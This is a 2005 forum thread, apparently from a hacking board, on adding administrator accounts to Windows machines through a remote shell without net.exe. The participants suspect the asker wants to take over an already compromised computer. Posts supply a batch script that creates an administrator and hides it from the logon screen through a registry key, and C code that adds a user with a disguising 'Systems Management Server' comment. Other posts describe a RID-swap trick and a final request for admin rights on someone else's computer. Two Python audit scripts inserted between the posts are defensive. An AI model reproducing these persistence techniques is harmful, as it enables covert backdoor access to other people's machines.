Hmmm, is it possible to add Admin-Users with reg-files and regedit from shell? Even searched on google for it...
Greetings
saetji
Apr 25 2005, 09:32 PM
Not using reg files as far as I know - it has to be done from the net user command
tibbar
Apr 26 2005, 02:12 AM
I think it is possible, run regedit in the context of the LOCALSYSTEM and look at the new keys that previously were invisible.
Remember that the SAM is actually part of the registry hive
belgther
Apr 26 2005, 05:29 AM
As far as I know, hidden admin users can be added there (or was it the way of hiding existing admin users from logon screen?) Maybe reversing the CPL file for user controls should do the trick...
PSR
Apr 26 2005, 12:12 PM
hmmm, that all won't help me :/
I think it's not possible I think...the problem is, what can I do, when net.exe is damaged or not existent?
r00t
Apr 26 2005, 03:42 PM
QUOTE(PSR @ Apr 26 2005, 12:12 PM)
hmmm, that all won't help me :/
I think it's not possible I think...the problem is, what can I do, when net.exe is damaged or not existent?
When net.exe is damaged there should be (depends on the OS) a net1.exe. You can also use that. When you delete net.exe, maybe by mistake, the new Windows OS regenerates it from %windir%\system32\dllcache\.
When you think it's damaged you can delete it and it should copy a working one from %windir%\system32\dllcache\.
The info about regenerating I only tested on Windows XP! Don't know if it works on older versions too.
If you have WinXP and up and you don't have a net.exe in dllcache, it can be that your system is corrupted.
Script kiddie "hackers" use methods like these to "secure" their "hacked" boxes.
You should take a look if you find files like ftp.exe, tftp.exe, rcp.exe, which these kiddies also delete a lot of the time.
The best way is to search for them in %windir%\system32\dllcache\ when you have a current OS like XP.
You have to change the view settings and show hidden files and system files to see it!
It can also be that they installed a rootkit on your machine and made files like ftp.exe etc. hidden.... Then maybe use tools like RootkitRevealer from Sysinternals (Google will do the job).
Sorry for my poor English, still learning.
I hope I could help you a bit....
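A defender-side check for the situation described in the post above, as an added example that is not part of the original thread: it reports which of the named tools are missing from system32 and whether a dllcache copy exists or differs. The function names, status labels and the temporary sample tree are constructed for illustration, and treating the cached copy as the reference is an assumption, so a mismatch is only a prompt for a closer look.

```python
import hashlib
import os
import tempfile

# Tools the post above names as ones that tend to get deleted.
WATCHED = ("net.exe", "net1.exe", "ftp.exe", "tftp.exe", "rcp.exe")

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def check_tools(system32, names=WATCHED):
    """Classify each tool by comparing system32 with system32\\dllcache."""
    cache_dir = os.path.join(system32, "dllcache")
    report = {}
    for name in names:
        live, cached = os.path.join(system32, name), os.path.join(cache_dir, name)
        has_live, has_cached = os.path.isfile(live), os.path.isfile(cached)
        if not has_live:
            report[name] = "restorable" if has_cached else "missing"
        elif not has_cached:
            report[name] = "no-cache-copy"   # nothing to compare against
        elif sha256_of(live) != sha256_of(cached):
            report[name] = "mismatch"        # live file differs from cached copy
        else:
            report[name] = "ok"
    return report

def demo():
    """Constructed tree standing in for %windir%\\system32 (not real binaries)."""
    layout = {  # name: (live bytes or None, dllcache bytes or None)
        "net.exe": (None, b"net"), "net1.exe": (b"net1", None),
        "ftp.exe": (b"changed", b"ftp"), "tftp.exe": (b"tftp", b"tftp"),
    }
    with tempfile.TemporaryDirectory() as root:
        cache = os.path.join(root, "dllcache")
        os.mkdir(cache)
        for name, (live, cached) in layout.items():
            for folder, data in ((root, live), (cache, cached)):
                if data is not None:
                    with open(os.path.join(folder, name), "wb") as fh:
                        fh.write(data)
        return check_tools(root)

if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name:10} {status}")
```

Running it against a mounted offline copy of the disk avoids the case the post mentions, where a rootkit hides files from the running system.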
da_cash
Apr 26 2005, 06:15 PM
Maybe I'm wrong but if net.exe is corrupted you can always start the sfc check
SFC /SCANNOW
then if the file integrity is corrupted the system will prompt to insert the CD to fix bad files.
assom
Apr 26 2005, 11:09 PM
He is explicitly saying "from shell" so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!! that would be a nice thing to do
r00t
Apr 26 2005, 11:15 PM
QUOTE(assom @ Apr 26 2005, 11:09 PM)
He is explicitly saying "from shell" so surely SFC /scannow will prompt the not knowing hacked user to insert his XP CD!!!! that would be a nice thing to do
Hei assom
I also thought a bit that way as I read the question ;-)
KoNh
Apr 27 2005, 12:09 AM
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are not in place that could be for two reasons:
1) Sysop knows what script kiddies use to get in their boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (I doubt). Well you've tried, after some time trying you will have to learn that you can lose sometimes, this is a "hacker way to do" too. Then you will try harder on next one after "googling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making, re-hacking is lame and punished by many people out there, be careful "stealing" other's HQ. Also your account on GSO could be deleted for that. But I guess you will explain to us that it is your personal computer from which you lost the key ...
r00t
Apr 27 2005, 01:31 AM
QUOTE(KoNh @ Apr 27 2005, 12:09 AM)
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are not in place that could be for two reasons:
1) Sysop knows what script kiddies use to get in their boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (I doubt). Well you've tried, after some time trying you will have to learn that you can lose sometimes, this is a "hacker way to do" too. Then you will try harder on next one after "googling" all week long.
If it's the second, hey you are breaking the "almost rulez" from stro-making, re-hacking is lame and punished by many people out there, be careful "stealing" other's HQ. Also your account on GSO could be deleted for that. But I guess you will explain to us that it is your personal computer from which you lost the key ...
I also thought it could be a stromaker, rehacker question... But I also thought it could be he got hacked..... Or he deleted it, but then the OS will regenerate it. But read my first reply for more info.
RFlash
Apr 27 2005, 07:43 AM
Not directly with a reg file (but I'm reading that was not the real request), but you could find here some good examples to do the job with a .vbs:
Found this exploit a while back.. may still work. Not sure if it is what you are really looking for but.. you can also change hex dec from the admin account to your users account. Possibly.. like user hex= 0x123 and administrator hex= 0x3ea. You will have to find the number for the account you are looking for. Also if you change that hexdec you will need to login as the Administrator with the USERS password. If it still works....
kv-
White Scorpion
Apr 29 2005, 04:51 PM
what about writing a program yourself which can add users like net.exe can? I'm sure that would solve your problem.
ninar12
Apr 30 2005, 08:51 PM
yep scorpion
it will be the best way 2 code a tool that does that job but what's the API he should use? Give him some info and I'm sure he's gonna code it himself
QUOTE
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are not in place that could be for two reasons:
u forgot rcp, echo and debug
White Scorpion
May 1 2005, 03:07 PM
NetUserAdd is the most important one. It is located in netapi32.dll, open netapi32.dll with a program like PE Explorer to look at the functions it exports. It has a lot more interesting APIs
KarachiKing555
May 3 2005, 10:21 AM
U can add a hidden admin on machine via .bat here is the code !
CODE
net user HIDDEN-USER /add
net localgroup administrators Raffye /add
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%SystemRoot%\tmp.reg
@echo "Raffye"=dword:00000000>>%SystemRoot%\tmp.reg
regedit /s %SystemRoot%\tmp.reg
Del %SystemRoot%\tmp.reg
I got a lil cmd line prog that puts an invisible user in the administrator group (no matter what's the name of the administrator group). You must be administrator to do that. Don't know if I upload it here or not, msg me if u want !!
syntax:
Hideuser.exe username pass
or
Hideuser.exe username -------> You'll be asked for a pass
or
Hideuser.exe --------> You'll be asked for a username and a pass
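For spotting this on a machine you are responsible for, the following added example (not part of the original thread) parses a regedit export of the Winlogon key and flags every account whose SpecialAccounts\UserList value is dword 0, marking those that also appear in an Administrators member list. The function names, verdict labels, account names and both sample inputs are constructed for illustration.

```python
import re

# Key the batch file above writes to in order to hide an account at logon.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon\SpecialAccounts\UserList").lower()
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def decode_reg_export(raw: bytes) -> str:
    """'Version 5.00' exports are UTF-16LE with a BOM; REGEDIT4 files are ANSI."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    return raw.decode("cp1252", errors="replace")

def hidden_accounts(reg_text: str) -> list:
    """Names under UserList whose value is dword 0 (not shown at logon)."""
    hidden, in_key = [], False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            # Only values that follow the UserList key header are considered.
            in_key = line.strip("[]").lower() == USERLIST_KEY
            continue
        match = VALUE_RE.match(line) if in_key else None
        if match and int(match.group(2), 16) == 0:
            hidden.append(match.group(1))
    return hidden

def audit(reg_text: str, administrators: list) -> list:
    """Pair each hidden account with a verdict; hidden admins matter most."""
    admins = {name.lower() for name in administrators}
    return [(name, "hidden-admin" if name.lower() in admins else "hidden")
            for name in hidden_accounts(reg_text)]

# Constructed sample: a regedit export and an Administrators member list.
SAMPLE_EXPORT = b"\xff\xfe" + "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]",
    '"ExampleFlag"=dword:00000000',
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]",
    '"svc_backup"=dword:00000000',
    '"frontdesk"=dword:00000001',
    '"kiosk"=dword:00000000',
]).encode("utf-16-le")
SAMPLE_ADMINS = ["Administrator", "SVC_Backup"]

if __name__ == "__main__":
    for name, verdict in audit(decode_reg_export(SAMPLE_EXPORT), SAMPLE_ADMINS):
        print(f"{verdict:12} {name}")
```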
Erion
May 31 2005, 01:18 PM
I coded this long ago, but I am pretty sure it worked... Can't remember which permissions did the new user have though... that you'll have to look into
#include <windows.h>
#include <lm.h>
#include <stdio.h>

// Pointers to the functions exported by netapi32.dll (same calling convention as in lm.h)
typedef NET_API_STATUS (NET_API_FUNCTION *ptrNetUserAdd)(LMSTR, DWORD, LPBYTE, LPDWORD);
typedef NET_API_STATUS (NET_API_FUNCTION *ptrNetUserGetInfo)(LPWSTR, LPWSTR, DWORD, LPBYTE *);

int main(int argc, char *argv[])
{
    HMODULE handleDLL;
    ptrNetUserAdd NetUserAdd;
    USER_INFO_1 ui;
    WCHAR usrName[UNLEN + 1], usrPassWord[PWLEN + 1];
    NET_API_STATUS nStatus;
    DWORD dwError = 0;

    printf("\n%s coded by Erion for Minted\n\n", argv[0]);
    if (argc != 3) {
        printf("Usage: %s <username> <password>\n", argv[0]);
        return 1;
    }

    handleDLL = LoadLibraryA("netapi32.dll"); // Load the desired DLL
    if (handleDLL != NULL) {
        NetUserAdd = (ptrNetUserAdd)GetProcAddress(handleDLL, "NetUserAdd"); // Search the address of the function
        if (NetUserAdd) {
            // Convert the strings from ANSI to Unicode; the call returns 0 if they do not fit the buffers
            if (!MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, usrName, UNLEN + 1) ||
                !MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, usrPassWord, PWLEN + 1)) {
                printf("Username or password could not be converted\n");
                FreeLibrary(handleDLL);
                return 1;
            }

            ZeroMemory(&ui, sizeof(ui));
            ui.usri1_name = usrName;
            ui.usri1_password = usrPassWord;
            ui.usri1_priv = USER_PRIV_USER;
            ui.usri1_home_dir = NULL;
            ui.usri1_comment = L"DO NOT MODIFY. Systems Management Server Internal Account";
            ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;
            ui.usri1_script_path = NULL;
            // call the function
            nStatus = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
            if (nStatus != NERR_Success) {
                switch (nStatus) {
                case ERROR_ACCESS_DENIED: printf("ACCESS DENIED.\n"); break;
                case NERR_InvalidComputer: printf("The computer name is invalid.\n"); break;
                case NERR_NotPrimary: printf("The operation is allowed only on the primary domain controller of the domain.\n"); break;
                case NERR_GroupExists: printf("The group already exists.\n"); break;
                case NERR_UserExists: printf("The user account already exists.\n"); break;
                case NERR_PasswordTooShort: printf("The password is shorter than required.\n"); break;
                default: printf("Unknown Error %lu!\n", (unsigned long)nStatus); break; // report the status code, not the parameter index
                }
            }
            else
                printf("User %s added succesfully\n", argv[1]);
        }
        else
            printf("Couldn't get the NetUserAdd Address\n");
        FreeLibrary(handleDLL); // only free a handle that was actually loaded
    }
    else
        printf("LoadLibrary() failed for netapi32.dll\n");

    return 0;
}
Erion
May 31 2005, 01:20 PM
ooops, posted it twice
GekAapie
Jun 23 2005, 12:13 PM
I have an account on another comp I just got but there I only got an account with lots of limits. I want to change this but how do I do this cause I don't have the pass or name of the ADMIN account..
(the comp runs on win2000)